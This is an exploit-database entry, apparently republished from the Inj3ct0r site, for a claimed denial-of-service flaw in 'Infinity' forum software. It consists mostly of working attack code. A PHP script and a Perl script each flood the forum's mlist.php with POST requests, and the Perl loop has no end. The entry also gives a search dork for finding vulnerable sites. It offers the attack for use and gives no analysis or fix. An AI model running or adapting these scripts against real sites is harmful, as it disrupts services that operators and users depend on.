Infinity 0-day Denial of Service

2010-06-14T00:00:00
ID SECURITYVULNS:DOC:24063
Type securityvulns
Reporter Securityvulns
Modified 2010-06-14T00:00:00

Description

================================ Infinity 0-day Denial of Service ================================

         The largest Exploit Database in the world !

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ 1 1 /' \ /'`\ /\ \ /'`\ 0 0 /\, \ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ 1 1 \//\ \ /' _ `\ \/\ \//\< /'\ \ \/\ \ \ \ \/\`'_\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \/\ \ \\ \ \\ \ \ \/ 1 1 \ \\ \\ \\\ \ \ \_/\ \\\ \__\\ \____/\ \\ 0 0 \//\//\//\ \\ \// \// \/__/ \/___/ \// 1 1 \ \_/ >> Exploit database separated by exploit 0 0 \// type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 #################################### 1 0 I'm SeeMe member from Inj3ct0r Team 1 1 #################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Dork: powered by infinity

[+] all versions 100% effected

[+] Finaly created by SeeMe

[+] Greetz to inj3ct0r Crew

[+] Site: Inj3ct0r.com

<? set_time_limit(60); for($i = 1 ; $i <= 10 ; $i++) { //to put curl to send POST request $ch = curl_init(); //change http://127.0.0.1/forum to the url of the forum curl_setopt($ch , CURLOPT_URL , 'http://127.0.0.1/forum/mlist.php?'); curl_setopt($ch , CURLOPT_POST , 1) ; curl_setopt($ch , CURLOPT_POSTFIELDS , 'action='); curl_exec($ch); curl_close($ch); } //Finished check it out! ?>

Perl Script

use Socket; if (@ARGV < 2) { &usage } $rand=rand(10); $host = $ARGV[0]; $dir = $ARGV[1]; $host =~ s/(http:\/\/)//eg; for ($i=0; $i<10; $i--) { $user="inf".$rand.$i; $data = "action=" ; $len = length $data; $foo = "POST ".$dir."mlist.php HTTP/1.1\r\n". "Accept: * /*\r\n". "Accept-Language: en-gb\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". "Host: $host\r\n". "Content-Length: $len\r\n". "Connection: Keep-Alive\r\n". "Cache-Control: no-cache\r\n\r\n". "$data"; my $port = "80"; my $proto = getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto); connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; send(SOCKET,"$foo", 0); syswrite STDOUT, "+" ; } print "\n\n"; system('ping $host'); sub usage { print "\tusage: \n"; print "\t$0 \n"; print "\tex: $0 127.0.0.1 /forum/\n"; print "\tex2: $0 127.0.0.1 /\n\n"; exit(); };

Inj3ct0r.com [2010-06-13]